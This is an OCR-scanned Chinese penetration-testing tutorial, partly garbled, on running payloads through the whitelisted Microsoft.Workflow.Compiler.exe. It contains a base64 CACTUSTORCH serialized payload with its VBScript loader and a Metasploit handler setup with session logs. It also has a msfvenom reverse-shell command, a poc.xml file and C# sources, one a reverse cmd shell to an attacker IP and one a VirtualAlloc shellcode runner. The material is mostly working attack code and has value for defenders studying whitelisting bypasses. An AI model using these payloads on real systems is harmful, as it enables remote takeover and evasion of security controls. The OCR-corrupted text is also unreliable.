S = s & "RW50cnkHAAAABHRSCGUIYXNZZW1ibHkGdGFyZ2VOEnRhcmdldFR5cGVBC3NlbWJseQ50YXJ 
S = 5 & "eXB1TmFtZQptZXRob2ROYW11DWRlbGVnYXRlRW5O0cnkBAQIBAQEDMFNS5C3RIbS5EZWX1Z2F 
S-S& "cmlhbGl6YXRpb25Ib2xkzXIrRGVsZWdhdGVFbnRyeQYFAAAAL1NSC3RIbSSSdW50aW11L1l:J 
55568 "aW5nLk11c3NhZ21uZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4 
5-56 "MCwgQ3VsdHVyZTi1uZXVOcmF sLCBQdWJ saWNLZX1Ub2tlbj1iNzdhNWMi1NjE5MzRlMDg5Bgc 
S = 5 & "dGFyZ2VOMAKGAAAABgKkAAAAPU31zdGVt LKR1bGVnYXR1BgoAAAANRHluYW1pYOludm9rZQc 
S = s & "ACJTeXNOZWOURGVsZWdhdGVTZXJpYWxpemFOaW9uSG9sZGVyAWAAAAhEZWX1Z2F0ZQdOYXJ 
S = s & "B211dGhvZDADBwMwU31zdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWXlZ2F 


S = s & "dHJ5Ai9TeXNOZWOuUmVmbGV j dG1vbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgk 
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"CQWAAAA JOQAAAAQEAAAAL1NSCSRIbSSSZWZsZWNOaWOuLk11bWJlckluzm9TZXJpYwxpemF 
"SG9sZGVyBgAAAAROYW1lIDEFzC2VtYmx5TmFtZQlDbGFzcOShbWUJU21nbmFOdXJlCk1lbWJ 
"cGUQR2VuZXJpYOFyZ3Vt ZW50CWEBAQEAAwgNU31z dGVt L1RScGVbXQKKAAAACQYAAAA JCQ^ 
"AAAALFNSCSRIbSSPYmplY3QgRHluYWipYOludm9rzShTeXNOZWOuT2 JqZWNOW10pCAAAAAC 
"AAIAAAAGEgAAACBTeXNOZWOuWG1sL1NjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5CS3F 
"bWwsIFZlcnNpb249Mi4wL;jAuMCwgQ3VsdHVyZTiuZXVOcmF sLCBQdWJ saWNLZX1Ub2t 1b j1 
"NWM1NjESMzRIMDg5BhQAAAAHdGFyZ2VOMAkGAAAABhYAAAAaU31zdGVt L1 J1ZzmxlY3Rpb24 
"ZW11bHkGFWAAAARMb2F kCg8MAAAAAB4AAA JNWpAAAWAAAAQAAAD/ /WAAUAAAAAAAAABAAA^ 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh-- 6DgCOCcCOhuAFMzSFUaG1zIHE 
"YWOgY2Fubm90IGJlIHJibiBpbiBETi1MgbW9kZSA4NDQOkAAAAAAAAAFBFAABMAQMAKNhXWQ^ 
"AAAAAAAiIASBMAAAFgAAAAYAAAAAAAByNQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAA^ 
"AAAAAAAAAIAAAAACAAAAAAAAAWBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAA/ 
"AESAAAAAQAAAKAMAAAAAAAAAAAAAAAAAAAAAAAAAY AAADAAAAAAAAAAAAAAAAAAAAAAAAAA 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAIAAAAAAAAAAAAAAATIIAAASAAAAA^ 
"AAAALnRleHQAAABAFQAAACAAAAAWAAAAAGAAAAAAAAAAAAAAAAAAIAAAY C5yC3 J j AAAAKAN 
"AAAABAAAABgAAAAAAAAAAAAAAAAAAEAAAEAUucmV s b2MAAAWAAAAAY AAAAA TAAAACAAAAAAL 
"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAFQ1AAAAAAAASAAAAATABQDA4IQAAKBMAAAEAAA^ 
"ААДАААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААН ТОЮМА 
"MAOABWEAAAEAABEEKBAAAAOKEGEG j mkoEQAACnMJAAAGDAgWf TUAAARyAQAACBMECgMAAHA 
"Cm8TAAAKF j EZChOAAHAOEgAACnIrAABWAygUAAAKEwQrF31IdAABWKBIAAApyQQAACAMOFA^ 
"EQQUFBQXGnAVAAAKFAgSAygBAAAG Jg17BAAABBMFEgUOFgAACn JXAABWKBCAAAOSbhEFFnF 
"ByAAMAAAHOAOAgAABhMGEgYoFgAACn JXAABWKBgAAAO SChEFFigEAAAGJ ioWEwcSCAaOaSc 
"EQURBgYRCBEHKAMAAAYmEQUWCXEAAAOWEQYWCXEAAAOWF nMRAAAKKAUAAAYmKnoC f hUAAAE 


"BAIoDwAACgICKBkAAAp9AQAABCOAABMwWwAgBgAAAAAAAAAA J--FQAACnO r AAAEAn4VAAAK f Sw 
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"fhuAAApgLQAABAJ+FQAACng4AAAEAn4VAAAKfTKAAAQCfhUAAAp90gAABAJ+FQAACne7AA 
"AAAKAG LOGQAACHOGAAAEKK ЈТЗКІВААЕАААААААМАААВ2Мі 4WL j UWN2 I3AAAAAAUADAAAACE 
"fgAATACAAEWJAAA j USRyaW5ncwAAAADgEAAAXAAAACNVUWABEQAAEAAAACNHVUTEAAAATBE 
"AAAjQmxvYgAAAAAAAAACAAABVXOCFAKCAAAA*gEZABYAAAEAAAAXAAAACQAAAF AAAAA JAAR 
"ABKAAAAZAAAAEGgAAAAEAAAABAAAABQAAAAEAAAABAAAABWAAAAAAmQYBAAAAAAAGAF WF kgc 


"KgcGAIoEYACPALIHAAAGALIEA4QYGADAFAQYGABEFAQYGALAFAQYGAHwF 4QYGA JUF 4QY GAMK 






















"AJAECWCGAHwECWCGAPQEAQYGAKsIqQYGAGEEqQYGAEOFqQYGALAGQqQYGAMOI qQYGAF kHqQY 
"qQYGAGYGqQYGAIQGCWwCAAAAA JOAAAAAAAQABAAEAEAB t BgAAPQABAAEACgAQAPQHAAAGAAE 
" ARAAZgYAAEEABAA JAAI BAAADCAAASQAIAAKAAGEAADY IAAB JACCACQAKABAABgCAADOAKgZ 
"AABtBAAASQABAAOAAGEAAPMGAAB JAEUACGAGAHOG+gAGAE QHPWAGACQE / QAGAHQIPwAGAOC 
"AMgD*gAGALOD-- gAGBpADAAFWgLICAwFWgMACAwFWgGQAAwFVWg1IgCAwFWgMIAAwFWgFMCAWF 
"AwFWgBOCAwFWgAUCAwFWgKABAwFWgAIDAwFWgF4BAwFWgEgBAwFWgOEBAwFWgEOCAwFWgDE 
"gGoDAwFWgIIDAwFWgJkCAwFWgBODAwFWgHYBAwFWgQHUAAWFWgDOAAwFWgCCBAwFWgKgAAWF 
"AWFWgLkBAWFWgBgBAWFWgMY BAWFWgOUCAWEGBp4DAAFWg JEABWFWgH I CBWEGAKYD+gAGADE 
"ABCHPWAGADMEPWAGAESD+gAGAJoD+gAGAOcF+gAGAO8F+gAGAECI+gAGAFUI+gAGAQQE+gA 
"*gAGAOCICWEGAAOACWEGABKAPWAGANIIPWAGANwIPWAGADQHPWAGBp4DAAFWgNACDgFWgOE 
"gJOBDgFWgNgCDgFWgNUBDgFWgABBDgFWg JOBDgFWgAMBDgEGBp4DAAFWgOCAEgFWgF CAEgF 
"EgFWgFgDEgFWgGkCEgFWgE8DEgFWgNOAEgFWgGADEgFWgBEGEgFWgCQGEgFWgDkGEgEAAA? 
"ICAAFgEBAAAAAACAA JY g8WwgqAQSAAAAAAIAAliAJCTUBEAAAAAAAgACWIGMIPWEVAAAAAAC 
"1ANFARCAUCAAAAAAhhg-* BuYAHGBYIAAAAACGAEOEUAE eAGShAAAAATY YPgCGACAA j CEAAAA 
"BWwYAIAAAAAEAOWQAAAIAUWQAAAMABACAAAQAOQCAAAUAWQCAAAY ACWGAAACAVAGAAAGAHAK 
"BACCAAOAZAYAAAEAGWQAAAIAiwgAAAMAAWYAAAQAAWQAAAUAS ggAAAEAdAgAAAIAf QgAAAN 
" AAQAAWY AAAUAt QYAAAEAdAQAAATASgMAAAEAdAgGAAAT AOQCAAAMA9WUAAAQA1QgAAAUAKAC 


" CwgAAACASgMAAAEAAgKAAATAAQAJAD4HAQARAD4HBGAZAD4HCgApAD4HEAAKAD4HEAASADA 
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" AD4HEAB JAD4HEABRAD4HEABZAD4HEABhAD4HFQBpAD4HEABXAD4HEAC JAD4HBGBSAD4HBgC 
"KQChADAHAQCpAAQELWCXAHkGNACXAKQIOAChABIHPWwChAGQGQgCXxADs JRgCXAC8 JRgC5AAC 
"ACQAWgAJACgAXWAJACWAZAA JADAAaQA JADQAbgA JADgACWAJADwAeAAJAEAAf QA JAEQAgg^ 
"hwAJAEWAjAAJAFAAKQAJAFQA1gAJAFgAmwAJAFWAOAAJAGAApQAJAGQAqgAJAGgArwA JAGw 
"AHAAUQAJAHQAvgAJAHgAWwA JAHwAyAAJAIAAZQAJAIQAOgAJAIQgAl1wAJAIWA3AAJAJAAAQA 
"5gAJAJgA6wAJAKAAWgA JAKQAXWA JAPQA1gAJAPgAmwA JAPwA8AA JAAABUQA JAAQBA4QA JAAC 
" AAwBvgAJABABwwA JABgBbgAJABwBCWwA JACABeAA JACQBf QAJACgBWgA JACwBXwA JADABZA^ 
"aQAJADgBggAJADwBhwA JAEAB j AAUAASAVgEuABMAXWEUABSAf gEUACMAhwEUACsAhwEUADP 
"ADSAmAEuAEMAhwEUAE sAhwEUAFMAmAEUAF sAngEUAGMApAEUAGSAZ gFDAF sAngG j AHMAWgE 
"WgADAXMAWgA j AXMAWgAaAIWwGAAEDACAAAQAAAQUABWwgBAAABBWA JCQEAAAE JAGMIAQAAAQS 
"AASAAAABAAAAAAAAAAAAAAAAAP CAAAACAAAAAAAAAAAAAABRAKKDAAAAAAMAAGAEAAIABQA 
"AgAHAAIACAACAAKAAgAAAAAAAHNOZWxs Y29 kZTMyAGNiUmVzZX J2ZWQyAGxwUmVz ZX J 2ZW( 
"p2R1bGU-AENyZWFOZVByb2N1c3NBAENSRUFURV9CUKVBSOFXQV1fR1JPTV9KTOIARVhFQiV 
"RUFEAENSRUFURV9TVVNQRUSERUQAUF JPQOVTUT19NTORFXO JBQO t HUK9VTKRTRUSEAERVUE* 
"RV9DTE9TRV9TT1VSQOUAQ1JFQVRFXORFRKFVTFRfRVJST1JfTU9ERQBDUKkVBVEVf TkVXXON 
"TEUARVhFQ1VURV9SRUFEV1J JVEUARVhFQ1VURQBSRVNFUIZFAENBQ1RVUAIRPUKNIAFdSSVR 
"VENIAFBIWVNJQOFMAFBSTOZJTEVfSOVSTkVMAENSRUFURV9QUKVTRVJWRV9DTORFXOFVVEF 
"VkKVMAENSRUFURV9TSEFSRURFVO9XX1ZETQBDUKVBVEV FUOVQQV JBVEVf VO9XX1ZETQBQUKS 
"XOX1PREVfQkFDSOdST1VORF9CRUdJTgBUT1BfRE9XTgBHTWBDUKVBVEVf TkVXX1BSTONFUTN 
"VVAAUF JPRK1MRV9VUOVSAFBSTOZ JTEVfUOVSVkVSAEXxBUkdFX1BBROVTAENSRUFURV9GT1 J 
"UwWwBJREXFX1BSSU9SSVRZXONMQVNTAF JFQUXUSUAFX1BSSU9SSVRZXONMQVNTAEh JRONFUF J 
"VElfQOxBU1MAQUJPVkVf TK9STUFMX1BSSUSSSVRZXONMQVNTAE JFTE9XX05PUK1BTF9QUK1 
"WV/9DTEFTUWBOTOFDQOVTUWBEVVBMSUNBVEVf UBFNRV9BQONFU1MAREVUQUNIRURfUF JPQOV 


"UkVBVEVfUF JPVEVDVEVEX1BSTONFU1MAREVCVUdfUF JPQOVTUWwBERU JVR19PTKXZX1RISVN 
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"QOVTUWBSRVNFVABDTO1NSVQAQ1 J FQVRFXOIHTK9SRV9TWVNURUI fREVGQVVMVABDUKVBVEY 
"QO9ERV9FT1ZJUK90TUVOVABFWFRFTKRFRF9TVEFSVFVQSUBGT19QUKVTRUSUAENSRUFURVe 
"SUSET1CAZHdYAF JEQURPTKxZAEVYRUNVVEVf V1 J JVEVDT1BZAElOSEVSSVRf UEFSRUSUXQE 
"SVRZAEIOSEVSSVRf QOFMTEVSX1BSSUSSSVRZAGR3WQB2YWX1ZVO9 f AGNiAG12Y29ybGliAGx 
"ZWFKSWQAZHdUaHJlYWRJZABkd1Byb2Nlc3NJZABDcmVhdGVSZWi1vdGVUaH JlYWQAaFRocmy 
"cFJlc2VydmVkAHVFeG10Q29kZQBHZXRFbnzpcm9ubWVudFZhcmlhYmxlAGxwSGFuZGx1AGj 
"cml10SGFuZGxlAGxwVGlObGUAbHBBCHBsaWNhdGlvbk5hbWUAZmxhbWUAbHBDb21 t YW5kTG] 
"YWX1ZVR5CGUAZmxBbGxvY2FOaW9uVHlwZQBHdWlkQXROcmlidXRlAERlYnVnZ2FibGVBdHE 
"dGUAQ29tVmlzawWJsZUFOdHJpYnVOZQBBC3N1bWJseVRpdGx1lQXROcmlidXRlAEFzc2VtYmx 
"ZGVtYXJrQXROcmlidXRlAGR3RmlsbEFOdHJpYnVOZQBBC3NlbWJseUZpbGVWZXJzaW9uQXR 
"dXRlAEFzc2VtYmx5Q29uzmlndXJhdGlvbkFOdHJpYnVOZQBBC3N1bWJseURlc2NyaXBOaWc 
"cmlidXRlAEZsYWdzQXROcmlidXRlAENvbXBpbGFOaw9uUmVsYXhhdGlvbnNBdHRyaWJidGL 
"ZwiibHlQcm9kdWNOQXROcmlidXRlAEFzc2VtYmx5Q29weXJpZ2hOQXROcmlidXRlAEFzC2V 
"Q29tcGFueUFOdHJpYnVozQBSdw50aW11Q29tcGFOaWJpbGlOeUFOdHJpYnVOZQBkdi1hTaX[ 
"WVNpemUAZHdTdGFj aNpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2RpZm1lcmZsYWCcATkS 
"RV9Nb2RpZmllcmzsYWcAV1JJVEVDTO1CSUSFXO1vZGlmaWVyZmxhzwBGcm9tQmFzZzTYOGUSR 
"AFRVUSRyaWw5nAGNhY3R1ciRvcmNoAGdldF9MZW5ndGgATWFyc2hhbABrZXJuZWwzMi5kbGw 
"VFVTVE9SQ0gUuZGXsAFN5c3R1IbQBFbnVtAGxwTnVtYmVyT2ZCeXR1cidyaXROZWAAbHBQcmS 
"SWw5mb3JtYXRpb24AU31zdGVtL1JlzmxlY3Rpb24ATWVtb3J5UHJvdGV;j dGlvbgBscFNOYXJ 
"bmZvAFplcmB8AbHBEZXNrdG9wAGJi1ZmZlcgBscFBhcmFtZXRlcgBoU3RkRXJyb31ALmNOb31 
"ZwNicmlOeURlc2NyaXBOb31ASW5OUHRyAFNSc3RlbSSEaWFnbm9zd61;jcwBTeXNOZWOUuUnV 
"ZS5JbnRlcm9wU2VydmljZXMAU3l1zdGVtLlJi1bnRpbwUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ 
"bmdNb2RlcwBiSW5oZXJpdEhhbmRsZXMAbHBUaHJ1YWRBdHRyaWJ1dGVzAGXxwUHJvY2VzcOF 


"YnVOZXMAU2Vj dXJpdH1BdHRyaWJ1dGVzAGR3Q3J1YXRpb25GbGFncwBDcmVhdGVQcm9 j ZXh 
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"ZGMAZHdGbGFncwBEdXBs awNhdGVPCHRpb25zAGR3WENvdw5OQ£hhcnMAZHdZQ291bnRDaGF 
"ZXJtaWShdGVQcm9 j ZXNzAGhQcm9 j ZXNZAGxwQmFz ZUFKZH 1c 3MAbHBBZGRyZXNZ AGXWUSF 
"ZGRyZXNZzAENvbmNhdABPYmplY3QAZmxQcm90ZWNOAGXwRW52aXJvbm11bnQAQ29udmVydAE 
"SW5wdXQAaFNOZE91dHB1dAB3U2hvdidpbmRvdwBWaXJOdWFsQWxsb2NFeABiaW5hcnkAV3J 
"cm9jZXNzTWVtb3J5AGxwQ3VycmVudERpcmV j dG9yeQBvcF9FcXVhbGl10eQBvcF9JbmVxdWF 
"AAAAAAABAB1QAHIAbWBnAHIAYQBtAFCANgAGADMAMgAADXCAaQBUAGQAaQByAAAVXABTAHK 
"AEBAVWA2ADQAXAAAFVwAUWB5AHMAdAB1AGOAMWAyAFWAAAMWAAAARY * bzuL qxE-*aSSAzLs[ 
"IAEBCAMgAAEFIAEBEREEIAEBDgQgAQECDgc JHQUYEhwREA4 YGAg YBQABHQUOBAABDg4DIA^ 
"Dg4ODgIGGAMgAAAFAAICDgAEAAEIHAi3elxWGTTgiQQBAAAABAIAAAAEBAAAAAQIAAAABBA 
" TAAAAARAAAAAB IAAAAAEAAEAAAQAAGAABAAEAAAEAAGAAAQAEAAABAAGAAAEAEAAAAQAGAL 
"AQAEAAACAAQAAAQABAAACAAEAAAQAAQAACAABAAAAAEEAAAAAGQAAAAE BAAAAAGEAAAAEAC 
"BAAAAEAEAAAAGAQAMAAABAAAQAACBggCBgICBgkDBhEUAWYRGAIGBgMGESADBhEkKEWAKGA4 
"DAIRFBgOEhwQERAKAAUYGBgYESAR JAKABQIYGBOFGAgFAAICGAKKAACYGBg JGBg JGAUgAgE 
"AAgAAAAAABABAAEAVAIWV3 JhcESvbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAAQAQALQOF 
"VE9SQOgAAAUBAAAAAAUBAAEAACKBACQ1N j U5OGYxYyO2ZDg4L TQ5OTQt YTM5MiilhZjMzN2F 


"NZCAAAWBAAC XL j AuMCAWAAAASDUAAAAAAAAAAAAAY j UAAAAgAAAAAAAAAAAAAAAAAAAAAA£ 


"AFQ1AAAAAAAAAAAAAAAAXONV C kRsbE1haWAADXN j b3J1ZS5kbGWAAAAAAP8 1 ACAAEAAAAAA 





"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAE 
"ADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAE gAAABYQAAANAMAAAAAAAAAAAAANAMOAAAAV gE 
"VgBFAFIAUwBJAESATgBf AEKATgBGAEBAAAAAALOE 7 / AAAAEAAAABAAAAAAAAAAEAAAAAADE 
"AAAABAAAAATAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAC gBGAGKkAbAB LAE kAbgBmAG8AAA^ 


"BAAAAFQAcgBhAGAACWBSAGEAdABpAG8AbgAAAAAAAACWB JQCAAABAFMAdAByAGKAbgBnAE Y 
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" AGUASQBUAGYADWAAAHACAAABADAAMAAWADAAMAAGAGIAMAAAADAADAABAEMAbwBtAGOAZQE 
"CWAAAEMAQQBDAFQAVQBTAFQATwBSAEMASAAAACIAAQABAEMAbwBt AHAAYQBUAHKAT gBhAGE 
"AAAAAAAAAEAADAABAE YAaQBSAGUARAB LAHMAYWBYAGKACABOAGKADWBUAAAAAABDAEEA QWE 
"UWwBUAEBAUGBDAEgAAAAWAAgAAQBGAGKADAB LAF YAZQByAHMAaQBVAG4AAAAAADEAL gAWACA 
"ADAAAABAABAAAQBJAGAAdABlAHIAbgBhAGWATgBhAGOAZQAAAEMAQQBDAFQAVQBTAFQATWE 
"SAAUAGQABABSAAAAPAAMAAEATABLAGCAY QBSAEMADWBWAHKAc gBpAGcAaABOAAAAQWBBAEN 
"AFMAVABPAFIAQwBIAAAAKgABAAEATABlAGCAYQBSAFQACgBhAGQAZQBtAGEACgBr AHMAAA/ 
"AABIABAAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGWAZQBUAGEAbQB TAAAAQWBBAEMAVABVAF 
"AFIAQWBIACAAZABSAGWAAAA4AAWAAQBQAHIAbWBKAHUAYWBOAE4AYQBtAGUAAAAAAEMAQQE 
"VQBTAFQATWBSAEMASAAAADQACAABAFAAC GBVAGQAdQB j AHQAVgB1AHIACWwBpAG8ADgAAADE 
"ACAAMAAUADAAAAAAAAgAAQBBAHMACWBlAGOAYgBSAHKAIABWAGUACgBZAGkAbwBUAAAAMQZ 
"LgAWACAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
"ААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА 
"AAAAAAAAAAAAAAAAADAAAAVAAABONQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
"ААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА 
"ААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААР 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAR 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
"AAAAAAAAAAAAAAABDQAAAAQAAAA J FUAAAAKGAAAACRYAAAAGGgAAACdTeXNOZWOuUmVmbGV 


"bi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACg SA" 
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ntry_class = "Cactustorch NENNEN ә e 区 EL 


im fmt, al, d, о 
fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFor 
al - CreateObject("System.Collections.ArrayList") 


al.Add fmt.SurrogateSelector 


Set d - fmt.Deserialize 2(Base64ToStream(s)) 


d.DynamicInvoke(al.ToArray()).CreateInstance(entry class) 


o 
" 


.. Flame binary,code 
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https //raw.githubusercontent.com/n і 
githubusercontent.co imdsecactiv aster/CACTLISTO 
‚ ebreach/CACTUSTORCH/master/CAC TUSTORGR 
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基于 白 名 单 Compiler.exe 执 行 payload 第 六 季 


说 明 : Microsoft.Workflow.Compiler.exe 所 在 路 径 没有 被 系统 添加 PATH 环 境 变量 中 ， 因 此 ， 
Microsoft.Workflow.Compiler 命 令 无 法 识别 。 


基于 白 名 单 Microsoft.Workflow.Compiler.exe 配 置 payload: 
Windows 7 默认 位 置 : 


C: \Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe 
C: NWindowsMMicrosoft.NETNFramework64Nv4.0.30319MMicrosoft.Workflow.Compiler.exe 


攻击 机 : 192.168.1.4 & Debian 


ҰШ 1: 192.168.1.3 & Windows 7 


配置 攻击 机 msf : 


msf exploit(rulti handler) » show options 
M le options fexploit/multi/handler) 


Name 


Fayload options (windows 
Name 
seh, thread, proce none) 
The listen addr (an interface may be specified) 
The listen port 
Exploit target: 


Id Name 


O Wildcard Target 


4 


mst explolt(multi handler) > exploit 


[+] Started reverse TCP handler on 192.168.1.4;53 





靶 机 执行 : 


C:\Windows\Microsoft .NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe pc 
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> exploit 


Started reverse TCP dler on 192.168.1.4:53 
Encoded stage with kata nal 
Sending encoded 
[*] Command shell ‚168. :53 -> 192.168.1.5:11340) at 2019-01-16 0@@:32.› 


[*] Encoded st 
[*] Send 


[*] Command shell on 6 ( .168.1.4:53 -> 192,168.1.5;11355) at 2019-01-16 09 


?pipconfig |findstr "19 

nfiq [find 
JohnxXDesktopzipconfig |findstr "192" 
i VW WE Dia E we {э РА. 





结合 meterpreter : 





it: payload.cs 需 要 用 到 System.Workflow.Activities 


靶 机 执行 : 


C:NWindowsMMicrosoft.NETNFramework64Nv4.0.30319NMMicrosoft.Workflow.Compiler.exe 


配置 攻击 机 msf: 


E 
IE 
о 


ехріо1ї (е1 handler) > show options 


module options (exploit/multi/handler): 


Name Current Setting Required De 


load options (wan x64/meterpreter/reverse tcp): 
Mame Current Setting Required Description 
ITFUNC OCess Exit technique accepted seh пгеа ocess, none) 
; 5 The listen address (an interface may 
The listen port 
it target 
Id Name 


Wildcard Target 


mst exploit (иі: hani > exploit 
СР handler on 192 
on 4 opened (192.168.1.4:53 -> 192,168.1.5; 25619} at 2019-01-17 00 -0500 


> getuid 
ame: John-PCXJohn 
getpid 
nt pid: 13032 
terpreter > 





payload 生 成 : 


msfvenom -p windows/x64/shell/reverse tcp LHOST-192.168.1.4 LPORT-53 -Ғ csharp 
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i :-% msfvenom -p windi 
[-] No platform w 1 
[-] No arch selected 

der or badchar 


4 from the p 
outputting raw pay 


bytes 


э М т» moe 


[o < 





附录 : poc.xml 


3k: windows/shell/reverse tcp 
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| <?xml version-"1.0" encodingz"utf-8"?» 


" . Жж? Се ud 


|» «CompilerInput xm1ns :iz"http://www.w3.0rg/2001/XMLSchema-instance" xmlns="http:/ 


«files xmlns:d2p1="http://schemas.microsoft .com/2003/10/Serialization/Arrays"> 
«d2pi:string»Micropoor.tcp«/d2pi:string» 


</files> 


<parameters xmlns:d2pi-"http://schemas.datacontract.org/2004/07/System.Workflc 
«assemblyNames xmlns:d3p1="http://schemas .microsoft .com/2003/10/Serializatic 
<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07 
«coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System. 
«embeddedResources xmlns:d3p1="http://schemas.microsoft .com/2003/10/Serializ 
«evidence xmlns:d3p1="http://schemas.datacontract .org/2004/07/System. Securit 
«generateExecutable xmlns="http://schemas.datacontract.org/2004/07/System.Cc 
«generateInMemory xmlns="http://schemas.datacontract.org/2004/07/System. Code 
«includeDebugInformation xmlns-"http://schemas.datacontract.org/2004/07/Syst 
<linkedResources xmlns:d3piz"http://schemas.microsoft.com/2003/10/Serializat 
«mainClass i:nil-"true" xmlns-"http://schemas.datacontract.org/2004/07/Syste 
«outputName xmlnsz"http://schemas.datacontract.org/2004/07/System.CodeDom.Cc 
«tempFiles i:nil="true" xmlnsz"http://schemas.datacontract.org/2004/07/Syste 
«treatWarningsAsErrors xmlns="http://schemas.datacontract.org/2004/07/Systen 
«warningLevel xmlnsz"http://schemas.datacontract.org/2004/07/System.CodeDom. 
«win32Resource i:nil-"true" xmlns="http://schemas.datacontract.org/2004/07/§ 
<d2p1:checkTypes>false</d2p1:checkTypes> 
<d2p1:compilewithNoCode>false</d2p1: compilewithNoCode> 

«d2pi:compilerOptions i:nil-"true" /> 
«d2p1:generateCCU»falsec/d2p1:generateCCU» 

<d2p1: languageToUse>CSharp</d2p1: languageToUse> 

«d2pi:libraryPaths xmlns:d3piz"http://schemas.microsoft.com/2003/10/Serializ 
«d2pi:localAssembly xmlns:d3piz"http://schemas.datacontract.org/2004/07/Syst 
«d2pi:mtInfo i:nil="true" /> 

«d2pi:userCodeCCUs xmlns:d3piz"http://schemas.datacontract.org/2004/07/Syste 


</parameters> 
</CompilerInput> 


Micropoor.tcp: 
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using System; ^ $ y 7 
using System.Text; 

using System.IO; 

using System.Diagnostics; 

using System.ComponentModel; 

using System.Net; 

using System.Net.Sockets; 

using System.Workflow.Activities; 


public class Program : SequentialworkflowActivity 


( 


static Streamwriter streamwriter; 


public Program() 
{ 
using(TcpClient client = new TcpClient("192.168.1.4", 53)) 
x 
using(Stream stream - client.GetStream()) 
( 
using(StreamReader rdr - new StreamReader(stream)) 


( 


streamwriter = new Streamwriter(stream); 


StringBuilder strInput - new StringBuilder(); 


Process p - new Process(); 
.StartInfo.FileName = "cmd.exe"; 
.StartInfo.CreateNoWindow = true; 
.StartInfo.UseShellExecute = false; 
.StartInfo.RedirectStandardOutput - true; 
.StartInfo.RedirectStandardInput = true; 
.StartInfo.RedirectStandardError = true; 
.OutputDataReceived += new DataReceivedEventHandler (Cmc 
Start); 

.BeginOutputReadLine(); 





5 = ӨТСЕК S “S Wu 


while(true) 

{ 
strlInput.Append(rdr.ReadLine()); 
p.StandardInput.WriteLine(strInput); 
strlInput.Remove(0, strInput.Length); 


private static void CmdOutputDataHandler(object sendingProcess, DataRece 
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{ E ` p: - 
< StringBuilder strOutput - new StringBuilder(); i ? 


if (!String.IsNullOrEmpty(outLine.Data)) 


t 
try 
( 
strOutput.Append(outLine.Data); 
streamwriter.WriteLine(strOutput); 
streamwriter.Flush(); 
+ 
catch (Exception err) ( ) 
} 





licropoor. rev1.cs: 


x64 payload 
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using System; . ж 
using System.Workflow.Activities; 
using System.Net; 
using System.Net.Sockets; 
using System.Runtime.InteropServices; 
using System.Threading; 
class yrDaTlg : SequentialWorkflowActivity { 
[DllImport("kernel32")] private static extern IntPtr VirtualAlloc(UInt322 
[DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr DStOGXQN 
[DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 eisuQbXk 
[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr 
public yrDaTlg() { 
byte[] QwKpwKhcs = {0xfc, 0х48, 0х83, Охе4, Oxf0, Oxe8, Oxcc, 0x00, 0x00, 0x00, Ox 
0x51, 0x56, 0x48, 0x31, Oxd2, 0x65, 0x48, Ox8b, 0x52, 0x60, 0x48, Ox8b, 0x52, 0x18, 0x48, 
Өх8р, 0x52, 0x20, 0x48, Ox8b, 0x72, 0x50, 0x48, OxOf , Oxb7, Ox4a, Ox4a, Ox4d, 0x31, Oxc9, 
0x48, 0x31, OxcO, Oxac, Ox3c, 0x61, 0x7c, 0x02, Ox2c, 0x20, 0x41, Oxc1, Oxc9, OxOd, 0x41, 
0x01, Oxc1, Oxe2, Охей, 0x52, 0x41, 0x51, 0x48, Ox8b, 0x52, 0x20, Ox8b, 0x42, Ox3c, Ox48, 
0x01, 0xd0, 0x66, 0x81, 0x78, 0x18, OxOb, 0x02, OxOf , 0x85, 0x72, 0x00, 0x00, 0x00, Ox8b, 
